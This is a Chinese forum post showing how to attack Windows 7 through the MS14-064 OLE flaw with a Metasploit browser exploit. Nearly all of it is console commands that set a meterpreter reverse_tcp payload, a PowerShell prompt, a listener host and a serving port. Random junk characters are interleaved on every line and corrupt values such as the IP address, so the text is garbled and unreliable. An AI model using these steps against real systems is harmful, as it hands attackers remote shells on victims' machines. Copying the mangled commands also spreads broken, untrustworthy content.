找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1213|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

* |8 A2 X, R" o3 V 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 3 d$ j1 b% [ } W' C) ~) p

. S4 ~$ A4 C' {% [

. q+ ]2 K% [/ ^4 a3 W 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 9 t- O. [9 T) f5 C

: O6 v, b' \' ]1 |+ @8 |/ O

* l2 g6 j$ F% c9 ? 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 9 f! r! T* G7 U" Y$ A

6 L! B/ U- }; f$ s4 h! B9 o

- U! P8 K/ I3 |6 F             set AllowPowershellPrompt true % S) ?( N' }4 a, }- I& d

0 J: v6 ]& Q& F* Y$ t" `- [

8 M% f. F, o8 x# d* l, X             Set LHOST 192.168.0.1099 r* p, ^/ G7 I

h1 C; z$ r) J. t3 a+ \( \! i; h

* d( }+ C' h/ @4 i0 w             set SRVHOST 192.168.0.1099 j6 W4 W3 W% i; Y

4 ^- R+ g9 }& S# G/ {" b. L

' m9 J, L. o8 G! p             Set uripath share+ r ?% c6 y1 w& Q

3 _9 T; Y4 A! V3 o5 N

2 z9 P' R* s, K2 W) V             Set srvport 80& b1 P1 I9 T6 r

4 u. E- h5 j' _

7 c+ Q% F1 b( f2 M( Y* w& j( s  / u6 \* w* }) [! P4 z2 I, z6 O) T- v

* H; ?) ~8 S D4 ~3 `- l3 W+ I

" Z% r# W* F, k' f1 I; ?  ( L1 j& l2 u7 [! Y, X' c5 x) L

4 P; X- Z. M" P

. y z! F6 q3 F! E6 Q   / s6 q, [! `/ u6 A3 F0 f m

# A! N# t: z! y% T

- |: g$ l: p! x& b- d" c   9 M' V l" k \/ n4 j0 d9 N- }- m

9 {- E" ?8 F, F8 o3 h3 k

2 Q0 H/ I$ b' K( S* N/ H8 j% u   ) e3 D0 }+ H3 E

0 ~9 l: R+ d! I4 ]

7 L8 S _! Z0 W" A* T! S 下面我们来访问本地地址如图:6 \ N& t3 W0 t" b

' b& d) p% `7 e

* a2 O( \5 I$ W1 L   0 Z( `4 Q: }" E$ t0 j2 I

5 c& @: F6 a( K$ W" y" V

4 B' G3 ?' K' O9 w U+ Y: Y4 P  9 D+ T( z# f6 j+ z. B

" @ u0 e5 G* R9 C

& f7 P- j3 v# U0 E3 c% P2 {. F 1 g4 X, U1 r, n( o

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表